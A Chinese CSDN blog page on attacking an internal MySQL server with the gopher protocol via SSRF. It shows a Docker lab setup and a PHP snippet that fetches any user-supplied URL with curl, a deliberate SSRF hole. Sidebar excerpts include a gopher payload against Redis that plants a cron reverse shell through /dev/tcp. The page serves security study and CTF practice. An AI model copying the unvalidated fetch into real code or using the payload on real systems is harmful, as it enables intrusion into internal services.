mysql 远程攻击_gopher 协议攻击内网 mysql

最新推荐文章于 2023-12-06 09:38:59 发布
最新推荐文章于 2023-12-06 09:38:59 发布
阅读量269 收藏
点赞数 1
文章标签: mysql 远程攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29480231/article/details/113264211
版权

本地测试

一开始使用的是 centos 6.5 的虚拟机

后来发现我的 curl 为 7.19.7 版本,不支持 gopher 协议

但是都失败了..

如果有 centos 6.5 升级 curl 版本成功的请告诉我!

环境搭建

失败了就只能慢慢的搭环境了,一时脑抽想体验一下 docker-compose,就去装了 dnmp(docker+nginx+mysql+php) 很棒的一个项目

不过默认 php_curl 扩展没有打开,需要手动开启,否则会报错 curl_init 函数未定义

我的环境大概就成了这样:

主机 80 端口映射到了 nginx 容器,3306 端口映射到了 mysql 容器

容器内则需要通过 ip 172.19.0.1 来访问到主机

nginx 容器内放一个 获取外部资源的 curl

if(isset($_GET["url"])) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $_GET["url"]);

// curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);

}

?>

进行本地测试

最低0.47元/天 解锁文章
学术女流氓
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql is fashion ctf_从一道CTF题目看Gopher攻击MySql
weixin_29032337的博客
01-20 194
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
gopher攻击mysql_gopher 协议在SSRF 中的一些利用
weixin_42131785的博客
02-05 1127
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
SSRF利用 Gopher |Gopher攻击mysql内网
crispr的博客
06-23 5097
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议之SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
mysql 允许所有远程连接_mysql允许远程访问
weixin_39532421的博客
01-27 550
mysql默认不能远程访问。what!怎么可能!大家满口赞誉的东东,居然默认是个单机版,太玩具了吧。其实,这只是对刚安装好的mysql来说的。刚装好的mysql,只有一个账号,就是管理员root,限定只能本机访问,好像也没啥不妥吧(反而更谨慎?)。那么,如何才能开启远程访问呢,比如同一个局域网里面,允许其他机器访问它的数据库?假设新装好的MYSQL,其初始账号情况如下:+------+------...
php mysql盲注_[题目]记一次利用gopher内网mysql盲注
weixin_42560991的博客
01-28 173
进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的...
GopherServer-master_C#_Gopher_
09-29
Implementation of Gopher in C#
frog_gopher:一个用于Gopher精彩世界的服务器
05-18
FROG.TIPS GOPHER服务器 _ __,..---""-._ ';-, A GOPHER , _/_),-"` '-. `\\ IS BASICALLY \|.-"` -_) '. || A MOUSE, /` a , \ .'/ RIGHT??? '.___,__/ .-' \_ _.-'.' |\ \ \
kio_gopher-开源
05-13
kio_gopher是地鼠kioslave。 Kioslave是一种kde技术,它允许kde程序访问给定的协议Gopher是类似于http的互联网协议,仅包含文本和链接。 这意味着您将在Konqueror中获得gopher://支持。
Gopher协议使用总结1
08-03
1. 明尼苏达大学的吉祥物是地鼠 2. 一个跑腿的助手就像地鼠一样在地下挖洞总能到达它想要的位置 1. 如果第一个字符是 > 或者 那么丢弃该行字符串,表示
Python库 | git_gopher-0.4.5.tar.gz
03-07
python库。 资源全名:git_gopher-0.4.5.tar.gz
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 645
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
gopher攻击mysql_CTFweb类型(二十七)gophermysql的利用及例题讲解
weixin_42462007的博客
02-05 292
本次来讲一下gopher协议MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议的利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL的利用:我这边创建一个demo,简单了...
Mysql 都会遭受哪些方面的攻击
程序猿DD
11-12 758
来源 |https://www.anquanke.com/post/id/219892Mysql数据库在无论是在渗透测试还是正常使用都是比较常见的数据库,在十一假期期间总结梳理了mys...
mysql远程rpo为0_RPO攻击
weixin_32391045的博客
02-28 197
RPO攻击最近见到几个题,了解到一种攻击方式,就是有RPO攻击0x00概述浏览器解析页面路径有误而导致css文件加载路径错误,从而引发的任意解析。引子:1.在php有些框架中会有些pathinfo模式的url,就像http://localhost/index.php/home/user/login/var/value/ 如果此时页面需要加载css,同时是以一个相对路径进行加载,会出现什么问题呢?2...
gophermysql的利用_gopher协议攻击利用
weixin_32873435的博客
02-23 198
攻击内网redis攻击redis常见exp为:对应的gopher协议为:gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.2...
gophermysql的利用及例题讲解
最新发布
DKPT的博客
12-06 115
查询语句(url编码)+url编码的登入请求。
gophermysql的利用_从一道CTF题目看Gopher攻击MySql
weixin_32394247的博客
02-23 101
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0×00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
Nagini靶机之HTTP3协议、SSRF漏洞(Gopher + Mysql)、Joomla漏洞、SSH公钥登录、浏览器密码还原等利用方法
qq_40898302的博客
05-10 596
在snape用户下查看home路径,发现hermoine用户的主目录下有一个bin文件,bin文件下的su_cp文件拥有s权限,su_cp是copy的功能,并有hermoine所属权限。将abc生成一个md5值的密码,将joomla数据库中,joomla_users表中的site_admin的password字段的值更新为abc的MD5值。在hermoine的家目录存在.mozilla文件夹,他是存放浏览器的信息的文件夹下面存在firefox浏览器,通过工具去查看浏览器的账户密码。
gopher攻击mysql_[WEB安全] SSRF 利用 Gopher 协议拓展攻击面【转载】
weixin_30268555的博客
02-23 155
0x01 概述Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。gopher协议支持发出 GET、POST 请求:可以先截获 get 请求包和 post 请求包,再构造成符合 gopher 协议的请求。 gopher ...
使用gopher协议写webshell
06-06
在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值